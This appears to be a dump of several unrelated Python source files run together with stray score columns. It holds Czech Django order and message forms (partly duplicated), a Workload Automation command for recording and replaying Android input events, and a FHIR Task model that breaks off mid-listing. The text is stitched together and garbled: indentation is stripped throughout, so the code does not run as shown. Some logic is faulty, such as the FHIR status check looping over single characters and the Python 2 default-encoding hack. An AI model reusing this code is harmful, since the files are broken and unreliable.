widget=forms.EmailInput(
attrs={'placeholder': 'E-mail'}),
error_messages={'required': error_required,
'invalid': invalid_email_message})
telefon = forms.IntegerField(label="Telefon",
widget=forms.NumberInput(
attrs={'placeholder': 'Telefon'}),
error_messages={'required': error_required})
zprava = forms.CharField(label="",
widget=forms.Textarea(
attrs={
'placeholder':
'Zde napište Vaši zprávu'}),
error_messages={
'required': error_required
})
def __init__(self, *args, **kwargs):
super(VzkazVavraForm, self).__init__(*args, **kwargs)
self.helper.layout = Layout(
Div('jmeno', style='padding:5px',
css_class='col-md-6 form-input-dark'),
Div('prijmeni', style='padding:5px',
css_class='col-md-6 form-input-dark'),
Div('email', 'telefon', 'zprava',
style='padding:5px', css_class='col-md-12 form-input-dark')
)
def handle(self, request, data):
Orders.objects.create(jmeno=data['jmeno'],
prijmeni=data['prijmeni'],
email=data['email'],
telefon=data['telefon'],
zprava=data['zprava'],
datum=timezone.now())
messages.success(request, "Zpráva byla úspěšně odeslána")
return True
class SendMessageForm(SelfHandlingForm):
import sys
reload(sys)
sys.setdefaultencoding('UTF8')
error_required = 'Toto pole je vyžadováno.'
zprava = forms.CharField(label="Vzkaz",
widget=forms.Textarea(
attrs={
'placeholder':
'Podpořte Jitku'}),
error_messages={
'required': error_required
},
help_text="Tento vzkaz se zobrazí na hlavní stránce")
def __init__(self, *args, **kwargs):
super(SendMessageForm, self).__init__(*args, **kwargs)
self.helper.layout = Layout(
Div('zprava', style='padding:5px',
css_class='col-md-12')
)
def handle(self, request, data):
order = Orders.objects.create(jmeno=timezone.now().year +
timezone.now().month + timezone.now().day,
prijmeni=str(timezone.now(
).year) + " " +
str(timezone.now().month) +
"." + str(timezone.now().day),
email=" ",
telefon=0,
zprava=data['zprava'],
datum=timezone.now())
order.save()
messages.success(request, "Vzkaz úspěšne poslán.")
return True | leonardo_module_kkadavy/forms.py | from __future__ import absolute_import
from django.utils import timezone
from crispy_forms.layout import \
HTML, Layout, Field, Fieldset, MultiField, Div
from crispy_forms.bootstrap import PrependedText
from django.contrib.auth import authenticate, get_user_model, login
from django.contrib.auth.models import User
from django.contrib.auth.tokens import \
default_token_generator as token_generator
from django.contrib.sites.models import Site
from django.core.urlresolvers import reverse
from django.utils.translation import ugettext_lazy as _
from horizon import forms, messages
from .models import Orders
from horizon.utils import validators
from horizon_contrib.forms import SelfHandlingForm
from leonardo.utils.emails import send_templated_email as send_mail
from django.conf import settings
class OrderForm(SelfHandlingForm):
import sys
reload(sys)
sys.setdefaultencoding('UTF8')
error_required = 'Toto pole je vyžadováno.'
invalid_email_message = 'Zadejte správný formát e-mailu.'
jmeno = forms.CharField(label="Jméno",
max_length=255,
widget=forms.TextInput(
attrs={'placeholder':
'Jméno',
'autofocus': 'autofocus'}),
error_messages={'required': error_required})
prijmeni = forms.CharField(label="Příjmení",
max_length=255,
widget=forms.TextInput(
attrs={'placeholder':
'Příjmení'}),
error_messages={'required': error_required})
email = forms.EmailField(label="E-mail",
widget=forms.EmailInput(
attrs={'placeholder': 'E-mail'}),
error_messages={'required': error_required,
'invalid': invalid_email_message})
telefon = forms.IntegerField(label="Telefon",
widget=forms.NumberInput(
attrs={'placeholder': 'Telefon'}),
error_messages={'required': error_required})
zprava = forms.CharField(label="Zpráva",
widget=forms.Textarea(
attrs={
'placeholder':
'Zašlete nám Vaši objednávku'}),
error_messages={
'required': error_required
})
def __init__(self, *args, **kwargs):
super(OrderForm, self).__init__(*args, **kwargs)
self.helper.layout = Layout(
Div('jmeno', style='padding:5px', css_class='col-md-6'),
Div('prijmeni', style='padding:5px', css_class='col-md-6'),
PrependedText('email', '@', placeholder="E-mail"),
Div('telefon', 'zprava', style='padding:5px',
css_class='col-md-12')
)
def handle(self, request, data):
Orders.objects.create(jmeno=data['jmeno'],
prijmeni=data['prijmeni'],
email=data['email'],
telefon=data['telefon'],
zprava=data['zprava'],
datum=timezone.now())
messages.success(request, "Objednávka úspěšně dokončena.")
return True
class VzkazVavraForm(SelfHandlingForm):
import sys
reload(sys)
sys.setdefaultencoding('UTF8')
error_required = 'Toto pole je vyžadováno.'
invalid_email_message = 'Zadejte správný formát e-mailu.'
jmeno = forms.CharField(label="Jméno",
max_length=255,
widget=forms.TextInput(
attrs={'placeholder':
'Jméno',
'autofocus': 'autofocus'}),
error_messages={'required': error_required})
prijmeni = forms.CharField(label="Příjmení",
max_length=255,
widget=forms.TextInput(
attrs={'placeholder':
'Příjmení'}),
error_messages={'required': error_required})
email = forms.EmailField(label="E-mail",
widget=forms.EmailInput(
attrs={'placeholder': 'E-mail'}),
error_messages={'required': error_required,
'invalid': invalid_email_message})
telefon = forms.IntegerField(label="Telefon",
widget=forms.NumberInput(
attrs={'placeholder': 'Telefon'}),
error_messages={'required': error_required})
zprava = forms.CharField(label="",
widget=forms.Textarea(
attrs={
'placeholder':
'Zde napište Vaši zprávu'}),
error_messages={
'required': error_required
})
def __init__(self, *args, **kwargs):
super(VzkazVavraForm, self).__init__(*args, **kwargs)
self.helper.layout = Layout(
Div('jmeno', style='padding:5px',
css_class='col-md-6 form-input-dark'),
Div('prijmeni', style='padding:5px',
css_class='col-md-6 form-input-dark'),
Div('email', 'telefon', 'zprava',
style='padding:5px', css_class='col-md-12 form-input-dark')
)
def handle(self, request, data):
Orders.objects.create(jmeno=data['jmeno'],
prijmeni=data['prijmeni'],
email=data['email'],
telefon=data['telefon'],
zprava=data['zprava'],
datum=timezone.now())
messages.success(request, "Zpráva byla úspěšně odeslána")
return True
class SendMessageForm(SelfHandlingForm):
import sys
reload(sys)
sys.setdefaultencoding('UTF8')
error_required = 'Toto pole je vyžadováno.'
zprava = forms.CharField(label="Vzkaz",
widget=forms.Textarea(
attrs={
'placeholder':
'Podpořte Jitku'}),
error_messages={
'required': error_required
},
help_text="Tento vzkaz se zobrazí na hlavní stránce")
def __init__(self, *args, **kwargs):
super(SendMessageForm, self).__init__(*args, **kwargs)
self.helper.layout = Layout(
Div('zprava', style='padding:5px',
css_class='col-md-12')
)
def handle(self, request, data):
order = Orders.objects.create(jmeno=timezone.now().year +
timezone.now().month + timezone.now().day,
prijmeni=str(timezone.now(
).year) + " " +
str(timezone.now().month) +
"." + str(timezone.now().day),
email=" ",
telefon=0,
zprava=data['zprava'],
datum=timezone.now())
order.save()
messages.success(request, "Vzkaz úspěšne poslán.")
return True | 0.451568 | 0.083628 |
import os
import sys
import signal
from math import ceil
from wlauto import ExtensionLoader, Command, settings
from wlauto.common.resources import Executable
from wlauto.core.resource import NO_ONE
from wlauto.core.resolver import ResourceResolver
from wlauto.core.configuration import RunConfiguration
from wlauto.core.agenda import Agenda
from wlauto.utils.revent import ReventRecording, GAMEPAD_MODE
class ReventCommand(Command):
# Validate command options
def validate_args(self, args):
if args.clear and not args.package:
print "Package must be specified if you want to clear cache\n"
self.parser.print_help()
sys.exit()
# pylint: disable=W0201
def execute(self, args):
self.validate_args(args)
self.logger.info("Connecting to device...")
ext_loader = ExtensionLoader(packages=settings.extension_packages,
paths=settings.extension_paths)
# Setup config
self.config = RunConfiguration(ext_loader)
for filepath in settings.get_config_paths():
self.config.load_config(filepath)
self.config.set_agenda(Agenda())
self.config.finalize()
context = LightContext(self.config)
# Setup device
self.device = ext_loader.get_device(settings.device, **settings.device_config)
self.device.validate()
self.device.dynamic_modules = []
self.device.connect()
self.device.initialize(context)
host_binary = context.resolver.get(Executable(NO_ONE, self.device.abi, 'revent'))
self.target_binary = self.device.install_executable(host_binary)
self.run(args)
def run(self, args):
raise NotImplementedError()
class RecordCommand(ReventCommand):
name = 'record'
description = '''Performs a revent recording
This command helps create revent recordings. It will automatically
deploy revent and even has the option of automatically opening apps.
Revent allows you to record raw inputs such as screen swipes or button presses.
This can be useful for recording inputs for workloads such as games that don't
have XML UI layouts that can be used with UIAutomator. As a drawback from this,
revent recordings are specific to the device type they were recorded on.
WA uses two parts to form the names of revent recordings in the format,
{device_name}.{suffix}.revent
- device_name can either be specified manually with the ``-d`` argument or
else the name of the device will be automatically determined. On an Android device it is obtained
from ``build.prop``, on Linux devices it is obtained from ``/proc/device-tree/model``.
- suffix is used by WA to determine which part of the app execution the
recording is for, currently either ``setup``, ``run`` or ``teardown``. This
should be specified with the ``-s`` argument.
**gamepad recording**
revent supports an alternative recording mode, where it will record events
from a single gamepad device. In this mode, revent will store the
description of this device as a part of the recording. When replaying such
a recording, revent will first create a virtual gamepad using the
description, and will replay the events into it, so a physical controller
does not need to be connected on replay. Unlike standard revent recordings,
recordings generated in this mode should be (to an extent) portable across
different devices.
note:
- The device on which a recording is being made in gamepad mode, must have
exactly one gamepad connected to it.
- The device on which a gamepad recording is being replayed must have
/dev/uinput enabled in the kernel (this interface is necessary to create
virtual gamepad).
'''
def initialize(self, context):
self.context = context
self.parser.add_argument('-d', '--device', help='The name of the device')
self.parser.add_argument('-s', '--suffix', help='The suffix of the revent file, e.g. ``setup``')
self.parser.add_argument('-o', '--output', help='Directory to save the recording in')
self.parser.add_argument('-p', '--package', help='Package to launch before recording')
self.parser.add_argument('-g', '--gamepad', help='Record from a gamepad rather than all devices.',
action="store_true")
self.parser.add_argument('-C', '--clear', help='Clear app cache before launching it',
action="store_true")
self.parser.add_argument('-S', '--capture-screen', help='Record a screen capture after recording',
action="store_true")
def run(self, args):
if args.device:
device_name = args.device
else:
device_name = self.device.get_device_model()
if args.suffix:
args.suffix += "."
revent_file = self.device.path.join(self.device.working_directory,
'{}.{}revent'.format(device_name, args.suffix or ""))
if args.clear:
self.device.execute("pm clear {}".format(args.package))
if args.package:
self.logger.info("Starting {}".format(args.package))
self.device.execute('monkey -p {} -c android.intent.category.LAUNCHER 1'.format(args.package))
self.logger.info("Press Enter when you are ready to record...")
raw_input("")
gamepad_flag = '-g ' if args.gamepad else ''
command = "{} record {}-s {}".format(self.target_binary, gamepad_flag, revent_file)
self.device.kick_off(command)
self.logger.info("Press Enter when you have finished recording...")
raw_input("")
if args.capture_screen:
self.logger.info("Recording screen capture")
self.device.capture_screen(args.output or os.getcwdu())
self.device.killall("revent", signal.SIGINT)
self.logger.info("Waiting for revent to finish")
while self.device.get_pids_of("revent"):
pass
self.logger.info("Pulling files from device")
self.device.pull_file(revent_file, args.output or os.getcwdu())
class ReplayCommand(ReventCommand):
name = 'replay'
description = '''Replay a revent recording
Revent allows you to record raw inputs such as screen swipes or button presses.
See ``wa show record`` to see how to make an revent recording.
'''
def initialize(self, context):
self.context = context
self.parser.add_argument('revent', help='The name of the file to replay')
self.parser.add_argument('-p', '--package', help='Package to launch before recording')
self.parser.add_argument('-C', '--clear', help='Clear app cache before launching it',
action="store_true")
# pylint: disable=W0201
def run(self, args):
self.logger.info("Pushing file to device")
self.device.push_file(args.revent, self.device.working_directory)
revent_file = self.device.path.join(self.device.working_directory, os.path.split(args.revent)[1])
if args.clear:
self.device.execute("pm clear {}".format(args.package))
if args.package:
self.logger.info("Starting {}".format(args.package))
self.device.execute('monkey -p {} -c android.intent.category.LAUNCHER 1'.format(args.package))
self.logger.info("Replaying recording")
command = "{} replay {}".format(self.target_binary, revent_file)
recording = ReventRecording(args.revent)
timeout = ceil(recording.duration) + 30
recording.close()
self.device.execute(command, timeout=timeout,
as_root=(recording.mode == GAMEPAD_MODE))
self.logger.info("Finished replay")
# Used to satisfy the API
class LightContext(object):
def __init__(self, config):
self.resolver = ResourceResolver(config)
self.resolver.load() | wlauto/commands/record.py |
import os
import sys
import signal
from math import ceil
from wlauto import ExtensionLoader, Command, settings
from wlauto.common.resources import Executable
from wlauto.core.resource import NO_ONE
from wlauto.core.resolver import ResourceResolver
from wlauto.core.configuration import RunConfiguration
from wlauto.core.agenda import Agenda
from wlauto.utils.revent import ReventRecording, GAMEPAD_MODE
class ReventCommand(Command):
# Validate command options
def validate_args(self, args):
if args.clear and not args.package:
print "Package must be specified if you want to clear cache\n"
self.parser.print_help()
sys.exit()
# pylint: disable=W0201
def execute(self, args):
self.validate_args(args)
self.logger.info("Connecting to device...")
ext_loader = ExtensionLoader(packages=settings.extension_packages,
paths=settings.extension_paths)
# Setup config
self.config = RunConfiguration(ext_loader)
for filepath in settings.get_config_paths():
self.config.load_config(filepath)
self.config.set_agenda(Agenda())
self.config.finalize()
context = LightContext(self.config)
# Setup device
self.device = ext_loader.get_device(settings.device, **settings.device_config)
self.device.validate()
self.device.dynamic_modules = []
self.device.connect()
self.device.initialize(context)
host_binary = context.resolver.get(Executable(NO_ONE, self.device.abi, 'revent'))
self.target_binary = self.device.install_executable(host_binary)
self.run(args)
def run(self, args):
raise NotImplementedError()
class RecordCommand(ReventCommand):
name = 'record'
description = '''Performs a revent recording
This command helps create revent recordings. It will automatically
deploy revent and even has the option of automatically opening apps.
Revent allows you to record raw inputs such as screen swipes or button presses.
This can be useful for recording inputs for workloads such as games that don't
have XML UI layouts that can be used with UIAutomator. As a drawback from this,
revent recordings are specific to the device type they were recorded on.
WA uses two parts to form the names of revent recordings in the format,
{device_name}.{suffix}.revent
- device_name can either be specified manually with the ``-d`` argument or
else the name of the device will be automatically determined. On an Android device it is obtained
from ``build.prop``, on Linux devices it is obtained from ``/proc/device-tree/model``.
- suffix is used by WA to determine which part of the app execution the
recording is for, currently either ``setup``, ``run`` or ``teardown``. This
should be specified with the ``-s`` argument.
**gamepad recording**
revent supports an alternative recording mode, where it will record events
from a single gamepad device. In this mode, revent will store the
description of this device as a part of the recording. When replaying such
a recording, revent will first create a virtual gamepad using the
description, and will replay the events into it, so a physical controller
does not need to be connected on replay. Unlike standard revent recordings,
recordings generated in this mode should be (to an extent) portable across
different devices.
note:
- The device on which a recording is being made in gamepad mode, must have
exactly one gamepad connected to it.
- The device on which a gamepad recording is being replayed must have
/dev/uinput enabled in the kernel (this interface is necessary to create
virtual gamepad).
'''
def initialize(self, context):
self.context = context
self.parser.add_argument('-d', '--device', help='The name of the device')
self.parser.add_argument('-s', '--suffix', help='The suffix of the revent file, e.g. ``setup``')
self.parser.add_argument('-o', '--output', help='Directory to save the recording in')
self.parser.add_argument('-p', '--package', help='Package to launch before recording')
self.parser.add_argument('-g', '--gamepad', help='Record from a gamepad rather than all devices.',
action="store_true")
self.parser.add_argument('-C', '--clear', help='Clear app cache before launching it',
action="store_true")
self.parser.add_argument('-S', '--capture-screen', help='Record a screen capture after recording',
action="store_true")
def run(self, args):
if args.device:
device_name = args.device
else:
device_name = self.device.get_device_model()
if args.suffix:
args.suffix += "."
revent_file = self.device.path.join(self.device.working_directory,
'{}.{}revent'.format(device_name, args.suffix or ""))
if args.clear:
self.device.execute("pm clear {}".format(args.package))
if args.package:
self.logger.info("Starting {}".format(args.package))
self.device.execute('monkey -p {} -c android.intent.category.LAUNCHER 1'.format(args.package))
self.logger.info("Press Enter when you are ready to record...")
raw_input("")
gamepad_flag = '-g ' if args.gamepad else ''
command = "{} record {}-s {}".format(self.target_binary, gamepad_flag, revent_file)
self.device.kick_off(command)
self.logger.info("Press Enter when you have finished recording...")
raw_input("")
if args.capture_screen:
self.logger.info("Recording screen capture")
self.device.capture_screen(args.output or os.getcwdu())
self.device.killall("revent", signal.SIGINT)
self.logger.info("Waiting for revent to finish")
while self.device.get_pids_of("revent"):
pass
self.logger.info("Pulling files from device")
self.device.pull_file(revent_file, args.output or os.getcwdu())
class ReplayCommand(ReventCommand):
name = 'replay'
description = '''Replay a revent recording
Revent allows you to record raw inputs such as screen swipes or button presses.
See ``wa show record`` to see how to make an revent recording.
'''
def initialize(self, context):
self.context = context
self.parser.add_argument('revent', help='The name of the file to replay')
self.parser.add_argument('-p', '--package', help='Package to launch before recording')
self.parser.add_argument('-C', '--clear', help='Clear app cache before launching it',
action="store_true")
# pylint: disable=W0201
def run(self, args):
self.logger.info("Pushing file to device")
self.device.push_file(args.revent, self.device.working_directory)
revent_file = self.device.path.join(self.device.working_directory, os.path.split(args.revent)[1])
if args.clear:
self.device.execute("pm clear {}".format(args.package))
if args.package:
self.logger.info("Starting {}".format(args.package))
self.device.execute('monkey -p {} -c android.intent.category.LAUNCHER 1'.format(args.package))
self.logger.info("Replaying recording")
command = "{} replay {}".format(self.target_binary, revent_file)
recording = ReventRecording(args.revent)
timeout = ceil(recording.duration) + 30
recording.close()
self.device.execute(command, timeout=timeout,
as_root=(recording.mode == GAMEPAD_MODE))
self.logger.info("Finished replay")
# Used to satisfy the API
class LightContext(object):
def __init__(self, config):
self.resolver = ResourceResolver(config)
self.resolver.load() | 0.440951 | 0.115836 |
from .fhirbase import fhirbase
class Task(fhirbase):
"""
A task to be performed.
Attributes:
resourceType: This is a Task resource
identifier: The business identifier for this task.
definitionUri: A reference to a formal or informal definition of the
task. For example, a protocol, a step within a defined workflow
definition, etc.
definitionReference: A reference to a formal or informal definition of
the task. For example, a protocol, a step within a defined workflow
definition, etc.
basedOn: BasedOn refers to a higher-level authorization that triggered
the creation of the task. It references a "request" resource such as
a ProcedureRequest, MedicationRequest, ProcedureRequest, CarePlan,
etc. which is distinct from the "request" resource the task is seeking
to fulfil. This latter resource is referenced by FocusOn. For
example, based on a ProcedureRequest (= BasedOn), a task is created to
fulfil a procedureRequest ( = FocusOn ) to collect a specimen from a
patient.
groupIdentifier: An identifier that links together multiple tasks and
other requests that were created in the same context.
partOf: Task that this particular task is part of.
status: The current status of the task.
statusReason: An explanation as to why this task is held, failed, was
refused, etc.
businessStatus: Contains business-specific nuances of the business
state.
intent: Indicates the "level" of actionability associated with the
Task. I.e. Is this a proposed task, a planned task, an actionable
task, etc.
priority: Indicates how quickly the Task should be addressed with
respect to other requests.
code: A name or code (or both) briefly describing what the task
involves.
description: A free-text description of what is to be performed.
focus: The request being actioned or the resource being manipulated by
this task.
for: The entity who benefits from the performance of the service
specified in the task (e.g., the patient).
context: The healthcare event (e.g. a patient and healthcare provider
interaction) during which this task was created.
executionPeriod: Identifies the time action was first taken against
the task (start) and/or the time final action was taken against the
task prior to marking it as completed (end).
authoredOn: The date and time this task was created.
lastModified: The date and time of last modification to this task.
requester: The creator of the task.
performerType: The type of participant that can execute the task.
owner: Individual organization or Device currently responsible for
task execution.
reason: A description or code indicating why this task needs to be
performed.
note: Free-text information captured about the task as it progresses.
relevantHistory: Links to Provenance records for past versions of this
Task that identify key state transitions or updates that are likely to
be relevant to a user looking at the current version of the task.
restriction: If the Task.focus is a request resource and the task is
seeking fulfillment (i.e is asking for the request to be actioned),
this element identifies any limitations on what parts of the
referenced request should be actioned.
input: Additional information that may be needed in the execution of
the task.
output: Outputs produced by the Task.
"""
__name__ = 'Task'
def __init__(self, dict_values=None):
self.resourceType = 'Task'
# type: str
# possible values: Task
self.definitionUri = None
# type: str
self.definitionReference = None
# reference to Reference: identifier
self.basedOn = None
# type: list
# reference to Reference: identifier
self.groupIdentifier = None
# reference to Identifier
self.partOf = None
# type: list
# reference to Reference: identifier
self.status = None
# type: str
# possible values: draft, requested, received, accepted,
# rejected, ready, cancelled, in-progress, on-hold, failed, completed,
# entered-in-error
self.statusReason = None
# reference to CodeableConcept
self.businessStatus = None
# reference to CodeableConcept
self.intent = None
# type: str
self.priority = None
# type: str
self.code = None
# reference to CodeableConcept
self.description = None
# type: str
self.focus = None
# reference to Reference: identifier
self._for = None
# reference to Reference: identifier
self.context = None
# reference to Reference: identifier
self.executionPeriod = None
# reference to Period
self.authoredOn = None
# type: str
self.lastModified = None
# type: str
self.requester = None
# reference to Task_Requester
self.performerType = None
# type: list
# reference to CodeableConcept
self.owner = None
# reference to Reference: identifier
self.reason = None
# reference to CodeableConcept
self.note = None
# type: list
# reference to Annotation
self.relevantHistory = None
# type: list
# reference to Reference: identifier
self.restriction = None
# reference to Task_Restriction
self.input = None
# type: list
# reference to Task_Input
self.output = None
# type: list
# reference to Task_Output
self.identifier = None
# type: list
# reference to Identifier
if dict_values:
self.set_attributes(dict_values)
self.assert_type()
def assert_type(self):
if self.status is not None:
for value in self.status:
if value is not None and value.lower() not in [
'draft', 'requested', 'received', 'accepted', 'rejected', 'ready',
'cancelled', 'in-progress', 'on-hold', 'failed', 'completed',
'entered-in-error']:
raise ValueError('"{}" does not match possible values: {}'.format(
value, 'draft, requested, received, accepted, rejected, ready, cancelled,'
'in-progress, on-hold, failed, completed, entered-in-error'))
def get_relationships(self):
return [
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'Task',
'child_variable': 'context'},
{'parent_entity': 'Identifier',
'parent_variable': 'object_id',
'child_entity': 'Task',
'child_variable': 'identifier'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'Task',
'child_variable': 'performerType'},
{'parent_entity': 'Task_Restriction',
'parent_variable': 'object_id',
'child_entity': 'Task',
'child_variable': 'restriction'},
{'parent_entity': 'Period',
'parent_variable': 'object_id',
'child_entity': 'Task',
'child_variable': 'executionPeriod'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'Task',
'child_variable': 'basedOn'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'Task',
'child_variable': 'focus'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'Task',
'child_variable': 'reason'},
{'parent_entity': 'Annotation',
'parent_variable': 'object_id',
'child_entity': 'Task',
'child_variable': 'note'},
{'parent_entity': 'Task_Input',
'parent_variable': 'object_id',
'child_entity': 'Task',
'child_variable': 'input'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'Task',
'child_variable': 'relevantHistory'},
{'parent_entity': 'Task_Requester',
'parent_variable': 'object_id',
'child_entity': 'Task',
'child_variable': 'requester'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'Task',
'child_variable': 'definitionReference'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'Task',
'child_variable': 'code'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'Task',
'child_variable': 'owner'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'Task',
'child_variable': 'statusReason'},
{'parent_entity': 'Identifier',
'parent_variable': 'object_id',
'child_entity': 'Task',
'child_variable': 'groupIdentifier'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'Task',
'child_variable': 'partOf'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'Task',
'child_variable': '_for'},
{'parent_entity': 'Task_Output',
'parent_variable': 'object_id',
'child_entity': 'Task',
'child_variable': 'output'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'Task',
'child_variable': 'businessStatus'},
]
class Task_Requester(fhirbase):
"""
A task to be performed.
Attributes:
agent: The device, practitioner, etc. who initiated the task.
onBehalfOf: The organization the device or practitioner was acting on
behalf of when they initiated the task.
"""
__name__ = 'Task_Requester'
def __init__(self, dict_values=None):
self.agent = None
# reference to Reference: identifier
self.onBehalfOf = None
# reference to Reference: identifier
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
def get_relationships(self):
return [
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'Task_Requester',
'child_variable': 'onBehalfOf'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'Task_Requester',
'child_variable': 'agent'},
]
class Task_Restriction(fhirbase):
"""
A task to be performed.
Attributes:
repetitions: Indicates the number of times the requested action should
occur.
period: Over what time-period is fulfillment sought.
recipient: For requests that are targeted to more than on potential
recipient/target, for whom is fulfillment sought?
"""
__name__ = 'Task_Restriction'
def __init__(self, dict_values=None):
self.repetitions = None
# type: int
self.period = None
# reference to Period
self.recipient = None
# type: list
# reference to Reference: identifier
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
def get_relationships(self):
return [
{'parent_entity': 'Period',
'parent_variable': 'object_id',
'child_entity': 'Task_Restriction',
'child_variable': 'period'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'Task_Restriction',
'child_variable': 'recipient'},
]
class Task_Input(fhirbase):
"""
A task to be performed.
Attributes:
type: A code or description indicating how the input is intended to be
used as part of the task execution.
valueBoolean: The value of the input parameter as a basic type.
valueInteger: The value of the input parameter as a basic type.
valueDecimal: The value of the input parameter as a basic type.
valueBase64Binary: The value of the input parameter as a basic type.
valueInstant: The value of the input parameter as a basic type.
valueString: The value of the input parameter as a basic type.
valueUri: The value of the input parameter as a basic type.
valueDate: The value of the input parameter as a basic type.
valueDateTime: The value of the input parameter as a basic type.
valueTime: The value of the input parameter as a basic type.
valueCode: The value of the input parameter as a basic type.
valueOid: The value of the input parameter as a basic type.
valueUuid: The value of the input parameter as a basic type.
valueId: The value of the input parameter as a basic type.
valueUnsignedInt: The value of the input parameter as a basic type.
valuePositiveInt: The value of the input parameter as a basic type.
valueMarkdown: The value of the input parameter as a basic type.
valueElement: The value of the input parameter as a basic type.
valueExtension: The value of the input parameter as a basic type.
valueBackboneElement: The value of the input parameter as a basic
type.
valueNarrative: The value of the input parameter as a basic type.
valueAnnotation: The value of the input parameter as a basic type.
valueAttachment: The value of the input parameter as a basic type.
valueIdentifier: The value of the input parameter as a basic type.
valueCodeableConcept: The value of the input parameter as a basic
type.
valueCoding: The value of the input parameter as a basic type.
valueQuantity: The value of the input parameter as a basic type.
valueDuration: The value of the input parameter as a basic type.
valueSimpleQuantity: The value of the input parameter as a basic type.
valueDistance: The value of the input parameter as a basic type.
valueCount: The value of the input parameter as a basic type.
valueMoney: The value of the input parameter as a basic type.
valueAge: The value of the input parameter as a basic type.
valueRange: The value of the input parameter as a basic type.
valuePeriod: The value of the input parameter as a basic type.
valueRatio: The value of the input parameter as a basic type.
valueReference: The value of the input parameter as a basic type.
valueSampledData: The value of the input parameter as a basic type.
valueSignature: The value of the input parameter as a basic type.
valueHumanName: The value of the input parameter as a basic type.
valueAddress: The value of the input parameter as a basic type.
valueContactPoint: The value of the input parameter as a basic type.
valueTiming: The value of the input parameter as a basic type.
valueMeta: The value of the input parameter as a basic type.
valueElementDefinition: The value of the input parameter as a basic
type.
valueContactDetail: The value of the input parameter as a basic type.
valueContributor: The value of the input parameter as a basic type.
valueDosage: The value of the input parameter as a basic type.
valueRelatedArtifact: The value of the input parameter as a basic
type.
valueUsageContext: The value of the input parameter as a basic type.
valueDataRequirement: The value of the input parameter as a basic
type.
valueParameterDefinition: The value of the input parameter as a basic
type.
valueTriggerDefinition: The value of the input parameter as a basic
type.
"""
__name__ = 'Task_Input'
def __init__(self, dict_values=None):
self.type = None
# reference to CodeableConcept
self.valueBoolean = None
# type: bool
self.valueInteger = None
# type: int
self.valueDecimal = None
# type: int
self.valueBase64Binary = None
# type: str
self.valueInstant = None
# type: str
self.valueString = None
# type: str
self.valueUri = None
# type: str
self.valueDate = None
# type: str
self.valueDateTime = None
# type: str
self.valueTime = None
# type: str
self.valueCode = None
# type: str
self.valueOid = None
# type: str
self.valueUuid = None
# type: str
self.valueId = None
# type: str
self.valueUnsignedInt = None
# type: int
self.valuePositiveInt = None
# type: int
self.valueMarkdown = None
# type: str
self.valueElement = None
# reference to Element: id
self.valueExtension = None
# reference to Extension
self.valueBackboneElement = None
# reference to BackboneElement
self.valueNarrative = None
# reference to Narrative
self.valueAnnotation = None
# reference to Annotation
self.valueAttachment = None
# reference to Attachment
self.valueIdentifier = None
# reference to Identifier
self.valueCodeableConcept = None
# reference to CodeableConcept
self.valueCoding = None
# reference to Coding
self.valueQuantity = None
# reference to Quantity
self.valueDuration = None
# reference to Duration
self.valueSimpleQuantity = None
# reference to Quantity
self.valueDistance = None
# reference to Distance
self.valueCount = None
# reference to Count
self.valueMoney = None
# reference to Money
self.valueAge = None
# reference to Age
self.valueRange = None
# reference to Range
self.valuePeriod = None
# reference to Period
self.valueRatio = None
# reference to Ratio
self.valueReference = None
# reference to Reference: identifier
self.valueSampledData = None
# reference to SampledData
self.valueSignature = None
# reference to Signature
self.valueHumanName = None
# reference to HumanName
self.valueAddress = None
# reference to Address
self.valueContactPoint = None
# reference to ContactPoint
self.valueTiming = None
# reference to Timing
self.valueMeta = None
# reference to Meta
self.valueElementDefinition = None
# reference to ElementDefinition
self.valueContactDetail = None
# reference to ContactDetail
self.valueContributor = None
# reference to Contributor
self.valueDosage = None
# reference to Dosage
self.valueRelatedArtifact = None
# reference to RelatedArtifact
self.valueUsageContext = None
# reference to UsageContext
self.valueDataRequirement = None
# reference to DataRequirement
self.valueParameterDefinition = None
# reference to ParameterDefinition
self.valueTriggerDefinition = None
# reference to TriggerDefinition
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
def get_relationships(self):
return [
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueCodeableConcept'},
{'parent_entity': 'ContactDetail',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueContactDetail'},
{'parent_entity': 'Contributor',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueContributor'},
{'parent_entity': 'RelatedArtifact',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueRelatedArtifact'},
{'parent_entity': 'Identifier',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueIdentifier'},
{'parent_entity': 'Attachment',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueAttachment'},
{'parent_entity': 'Meta',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueMeta'},
{'parent_entity': 'Quantity',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueSimpleQuantity'},
{'parent_entity': 'Extension',
'parent_variable': 'object_id',
'child_entity': 'Task_Input',
'child_variable': 'valueExtension'},
{'parent_entity': 'Address',
